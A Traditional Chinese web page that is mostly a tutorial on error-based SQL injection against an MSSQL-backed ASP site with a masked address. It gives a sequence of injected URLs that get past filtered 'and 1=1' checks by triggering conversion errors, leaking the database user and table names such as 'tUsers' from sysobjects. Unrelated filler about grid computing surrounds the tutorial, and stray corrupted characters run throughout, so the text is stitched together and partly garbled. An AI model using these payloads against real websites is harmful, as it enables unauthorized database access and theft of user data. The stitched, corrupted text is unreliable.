|
網絡技術是從1990年代中期發展起來的新技術,它把互聯網上分散的資源融為有機整體����,實現資源的全面共享和有機協作,使人們能夠透明地使用資源的整體能力并按需獲取信息。資源包括高性能計算機���、存儲資源、數據資源、信息資源����、知識資源���、專家資源�、大型數據庫���、網絡�����、傳感器等�。 當前的互聯網只限于信息共享,網絡則被認為是互聯網發展的第三階段�����。 對于很多的MSSQL數據庫�,要進行注入需要靈活的技巧與思路,就有如在第一篇文章里所提到的邏輯判斷法��。 有時候����,一個注入點的判斷不是單純靠and 1=1和and 1=2的,就有如這網站:
http://www.xxxxx.com/view_topic.asp?MainTopicID=M10-1&TopicID=M10-25
加個" ' "符號在后面�����,
http://www.xxxxx.com/view_topic.asp?MainTopicID=M10-1&TopicID=M10-25'
出錯信息如下�,
Unclosed quotation mark before the character string 'M10-25''
好�,應該是注入點了,再試and 1=1,
http://www.xxxxx.com/view_topic.asp?MainTopicID=M10-1&TopicID=M10-25'%20and%20'1'='1
是正常畫面��,再試and 1=2�,
http://www.xxxxx.com/view_topic.asp?MainTopicID=M10-1&TopicID=M10-25'%20and%20'1'='2
還是正常畫面,看來是邏輯判斷被過濾了����,是不是不能注入了呢���?然而����,邏輯判斷能被過濾����,執行錯誤可不能被過濾。在unclosed quotation mark的前提下,我們先讓它出錯��,然后再加個邏輯判斷給它過濾和關掉那個" ' "符號��。好�,思路是這樣����,就提交這樣的語句:
http://www.xxxxx.com/view_topic.asp?MainTopicID=M10-1&TopicID=M10-25'%20and%20user>0%20and%20'1'='1
出錯信息如下,
Syntax error converting the nvarchar value 'dbo' to a column of data type int
看到吧,成功了����。所以下次當邏輯判斷被過濾了�,就利用它再結合執行錯誤來進行注入好了��。
再試這語句���,
http://www.xxxxx.com/view_topic.asp?MainTopicID=M10-1&TopicID=M10-25'%20and%20(select%20top%201%20name%20from%20(select%20top%201%20name%20from%20sysobjects%20where%20xtype='U'%20order%20by%20name%20desc)%20a%20order%20by%20name)>0%20and%20'1'='1
出錯信息是,
Syntax error converting the nvarchar value 'tUsers' to a column of data type int
好��,第一個表名是'tUsers'
再來�,
http://www.xxxxx.com/view_topic.asp?MainTopicID=M10-1&TopicID=M10-25'%20and%20(select%20top%201%20name%20from%20(select%20top%202%20name%20from%20sysobjects%20where%20xtype='U'%20order%20by%20name%20desc)%20a%20order%20by%20name)>0%20and%20'1'='1
這次的出錯信息是,
Syntax error converting the nvarchar value 'tTechnical' to a column of data type int
第二個表名是'tTechnical'
好了�,就試到這里為止���。共勉之���。
網絡的神奇作用吸引著越來越多的用戶加入其中����,正因如此���,網絡的承受能力也面臨著越來越嚴峻的考驗―從硬件上��、軟件上�、所用標準上......�����,各項技術都需要適時應勢�����,對應發展�����,這正是網絡迅速走向進步的催化劑。
|
溫馨提示:喜歡本站的話��,請收藏一下本站�����!
